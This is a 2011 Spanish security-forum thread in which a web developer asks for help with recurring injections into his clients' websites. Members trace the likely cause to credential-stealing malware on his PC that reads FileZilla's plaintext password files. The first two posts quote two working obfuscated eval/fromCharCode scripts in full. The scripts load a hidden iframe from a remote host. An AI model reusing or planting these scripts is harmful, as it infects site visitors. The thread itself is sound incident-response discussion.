elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Virus en mis páginas webs
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Virus en mis páginas webs  (Leído 7,650 veces)
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Virus en mis páginas webs
« en: 5 Agosto 2011, 11:15 am »

Buenos días soy Programador Web.

No sé como pero se ha metido un virus en casi todas las páginas webs de mis clientes.

La cuestión es que no veo un punto de entrada común salvo mi ordenador, me explico:

1. - Se ha introducido en tres aplicaciones diferentes: Joomla, Prestashop, y un CMS Propio.

Por eso "creo" que descarto cualquier tipo de bug de las aplicaciones, ya que es siempre el mismo virus en los tres tipo de aplicaciones, y no puede haber el mismo tipo de fallo.

2. ¿Puede ser fallo del servidor?, porque los tres tienen Apaches con con versiones diferentes. A no ser, que haya un fallo común no detectado en Apache o PHP, o algo que ignore.

Os dejo cabeceras de varios servidores afectados, en diferentes hosting (1and1, CDMON, stratos):


TTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:09:55 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html

HTTP/1.1 200 OK
Date: Fri, 05 Aug 2011 09:10:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html


3. Puede ser mi ordenador, según el Avast está límpio, y no tengo conexiones abiertas por netstat.exe (uso Windows).

No sé muy bien que puede ser,

Cualquier ayuda es bienvenida. Elimino el virus, y cada X tiempo vuelve a aparecer. Me está causando muchos problemas. No encuentro nada en Google, etc.

Dejo un extracto del virus, si lo necesitáis completo me decís por favor, donde subirlo:


<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o... Resto de virus...




En línea

Mpoor es de super guay
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #1 en: 5 Agosto 2011, 11:17 am »

Pongo el virus completo, pensaba que no me iba a dejar:

Código:
<script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,123+o,113+o,106+o,108+o,113+o,100+o,113+o,121+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,51+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>

<script>var s,o=Math.atan(Math.tan(2));o*=2;o=Math.ceil(o);aa=document.createTextNode("ev"+"al");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,110+o,106+o,104+o,114+o,121+o,104+o,109+o,110+o,48+o,101+o,124+o,48+o,101+o,101+o,49+o,101+o,113+o,119+o,112+o,118+o,52+o,50+o,48+o,114+o,106+o,114+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script>

Infecta diferentes ficheros, donde le da la gana.


« Última modificación: 5 Agosto 2011, 11:29 am por MrPoor » En línea

Mpoor es de super guay
madpitbull_99
Colaborador
***
Desconectado Desconectado

Mensajes: 1.911



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #2 en: 5 Agosto 2011, 12:16 pm »

Puede que el servidor entero esté afectado y por tanto todos los dominios/vhosts que aloja.

Si estás usando un VPS lo más probable es que sea eso. Tampoco descartes la posibilidad de que se haya colado mediante alguna vulnerabilidad
de los CMS o del propio Apache.

Mira todos los scripts/ficheros en busca de alguno con nombre sospechoso (o no), podrías intentar hacer un grep para ver si hay algún script que añade ese
JS malicioso a los demás ficheros.

PD: Te lo muevo a seguridad. Ahí encaja mejor.
En línea



«Si quieres la paz prepárate para la guerra» Flavius Vegetius

[Taller]Instalación/Configuración y Teoría de Servicios en Red
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #3 en: 5 Agosto 2011, 13:39 pm »

Gracias por moverlo.

No uso VPS, y lo raro es que son 3 servidores distintos, unos están en CDMON, otros en Stratos y otros en 1and1, vamos tres proveedores diferentes. Son todos hosting compartido, no tengo acceso a la shell.

Es que no tengo ni idea.

Gracias de nuevo, y cualquier sugerencia bienvenida.

Tampoco tengo acceso a los logs. Uno puede que se me haya metido a través de un chat online ahora que recuerdo, pero el resto no tiene ese chat online, y como digo, son servidores diferentes, que para nada están relacionados.

En línea

Mpoor es de super guay
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #4 en: 5 Agosto 2011, 14:21 pm »

Una pista, ahora que me doy cuenta, que ha pasado en todos los clientes:

- No se añade a la base de datos, sino que sobreescribe el fichero a las páginas web, después antes fin de cierre del body


<SCRIPT DEL VIRUS>
</SCRIPT>
</body>
</html>

Curiosamente siempre ataca a los mismos ficheros en cada aplicacióin
Los permisos de las carpetas y subcarpetas son: 755 y los de ficheros 644

Por lo que solo admin o el dueño puede cambiarlo.

Todo comprobado, no hay ficheros ni carpetas con otros permisos de lectura.

Eso me hace descartar cualquier virus a nivel de aplicación. El dueño y grupo de los ficheros está correcto.

¿No parece esto más relacionado con mi cliente de FTP? Uso filezilla, pero una cosa rara es que el DreamWeaver me está fallando como nunca, se bloquea cosa que nunca hacia antes.

Pienso que algo puede haber robado los ficheros con los perfiles en Filezilla o DreamWeaver.

Hace poco quite un virus extraño, pero en descripción en internet no ponía ningún efecto de este tipo.

Por si esto puede ayudar.

Saludos.


En línea

Mpoor es de super guay
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Virus en mis páginas webs
« Respuesta #5 en: 5 Agosto 2011, 14:22 pm »

La verdad no se me ocurre nada y es bastante curioso lo que dices, yo también me hubiese jugado por una infección del lado del proveedor, pero no tiene sentido si lo único que hay en común entre esos tres servidores eres tú.

Y no tienes acceso de shell a los servidores?

Prueba revisando tu pc con otro AV
http://foro.elhacker.net/software/cds_autoarrancables_de_recuperacion_para_casos_de_emergencia-t204137.0.html (ahí tienes unos booteables)
[Edito]
Ahora viendo tu respuesta si noto un pequeño detalle. Hace algunos días salió a la luz que Filezilla guarda las credenciales en texto plano, por lo que una función "útil" para un "bicho" es buscar los ficheros de este programa ... http://bit.ly/owLeNo
Yo que tú probaría cambiando las contraseñas :)

Saludos
« Última modificación: 5 Agosto 2011, 14:34 pm por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #6 en: 5 Agosto 2011, 15:00 pm »

¡Si señor, lo estamos pillando!, casi seguro que es el filezilla.

He ido a:
C:\Documents and Settings\MIUSUARIO\Datos de programa\FileZilla y hay dos ficheros que contienen contraseñas en texto plano, como bien dice Novlucker.

Un fichero es filezilla.xml, que curiosamente tiene ahora mismo SOLO las contreseñas de los dos alojamiento infectados hoy, porque lo usé antes para eliminarlo, y el otro es sitemanager.xml, que ese sí contiene las contraseñas de todos mis sitios.

Os explico, el virus es clicico, afecto a 18 clientes en la primera vuelta, y hoy a comenzado la segunda, ayer infectó un sitio, y hoy 3. Está infectando ahora mismo.

¿Como podría pillarlo?
--------------------------
Se me ocurre tres formas:

1. Con un programa que vigile cuando un programa accede a un fichero. O sea, un filemonitor pero al revés.

2: cojo el fichero sitemanager.xml y lleno el campo <pass></pass> de A'es, a ver si provoca un overflow (con suerte está mal programado), y salta la ventana de windows, etc

3. eliminio el fichero sitemanager.xml, con suerte se cuelga el bicho.

Me imagino que no tienen una copia local, porque como digo es cíclico, supongo que revisa todo cada x tiempo por si hay un sitio nuevo.

¿sabéis algún programa que haga el punto 1 para Windows XP?
¿alguna otra solución?

Repito, el virus está infectando por ahí ahora mismo.

Saludos.
En línea

Mpoor es de super guay
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Virus en mis páginas webs
« Respuesta #7 en: 5 Agosto 2011, 15:26 pm »

Para la opción 1 puedes usar Process Monitor agregando un filtro por PATH.
Aunque tienes que estar atento y limpiar el log cada un rato porque es una bestialidad la cantidad de datos que recolecta y puede llegar a colgarse :P

Podrías intentar también subiendo el nivel del Firewall si lo tienes, de modo que en cuanto el "bicho" intente conectarse salte.

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #8 en: 8 Agosto 2011, 11:14 am »

creo que el problema es por parte de tu computador, recuerda que no por que tu antivirus no detecte virus, quiere decir que no los tengas...

-los archivos que son modificados, solo pueden ser alterados por el administrador, ahora crea un html y verifica si este se modifica inmediatamente o demora, me refiero en el tiempo en que tú estás modificando,o accediendo a la web como administrador, puede ser que tengas algún troyano enviado por la competencia, ya teniendo tu contraseña están editando el index, lo que puedes hacer para eso es ver los accesos con las IP así descartas si es un troyano, aunque este podría modificar el index desde tu mismo computador, hace otra prueba entra desde otro ordenador y que este nunca haya tenido acceso con el ordenador en el que estás (USB,CD,ETC) crea un fichero, html y ve si este se ha modifcado ahí podrás saber de donde viene el problema, te recomiendo que de todas formas cambies la contraseña lo antes posible.

creo que con lo que te comenté podrás acorralar el causante del problema, saludos
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
MrPoor

Desconectado Desconectado

Mensajes: 17



Ver Perfil WWW
Re: Virus en mis páginas webs
« Respuesta #9 en: 8 Agosto 2011, 12:03 pm »

Buenas de nuevo,

Como dice .:UND3R:. en problema está en mi ordenador, sin duda. Explico:

Tengo un cliente que no está en el Filezilla. Ayer se infectaron otros que no estaban infectados y ese cliente no. Por lo tanto:

1. 100% seguro tiene que ver con el Filezilla y las contraseñas en texto plano.
2. Pasé un escaneo completo del avast, y encontró un bicho en la carpeta system-volumen-information. Lo eliminé sin verificar que era (fallo).

3. Con el process monitor, veo una cosa rara:

Cuando abro filezilla, unos  segundos después se abre el svchost.exe



Uploaded with ImageShack.us

En sucesivas pruebas, si abro y cierro  rápido el Filezilla el svchost.exe no se lanza.

El svchost es un servicio legítimo de Windows, y se arranca con la ruta legítima (c:\windows\system32\svchost.exe.

El svchost en algo así como un lanzador de procesos, y ese PID en concreto, lanza esto:

C:\WINDOWS\system32\svchost.exe -k netsvcs

Ahí continúo investigando en Google, pero la información es imprecisa, hay páginas que dicen que es un virus, hay otras que dicen que es un servicio legítimo, etc.

La cuestión es que, en la carpeta c:\windows\system32\ no está tal fichero.

¿puede estar troyanizado el propio svchost, o el filezilla.exe?

En línea

Mpoor es de super guay
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Creando páginas webs
Diseño Gráfico
Zedmix 8 8,030 Último mensaje 7 Abril 2010, 12:31 pm
por madpitbull_99
Filtrar paginas webs en una LAN? « 1 2 »
Redes
Sauruxum 10 9,701 Último mensaje 14 Junio 2010, 10:32 am
por SuXoR
Escribir en paginas webs
.NET (C#, VB.NET, ASP)
skullmatador 1 2,327 Último mensaje 31 Julio 2011, 21:12 pm
por $Edu$
Como es lo del rating en la TV o en las paginas webs?
Dudas Generales
$Edu$ 2 5,072 Último mensaje 11 Octubre 2011, 21:29 pm
por $Edu$
Duda con paginas webs!
Hacking
xXCalaveraXx 5 4,253 Último mensaje 3 Octubre 2013, 08:52 am
por BlackM4ster
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines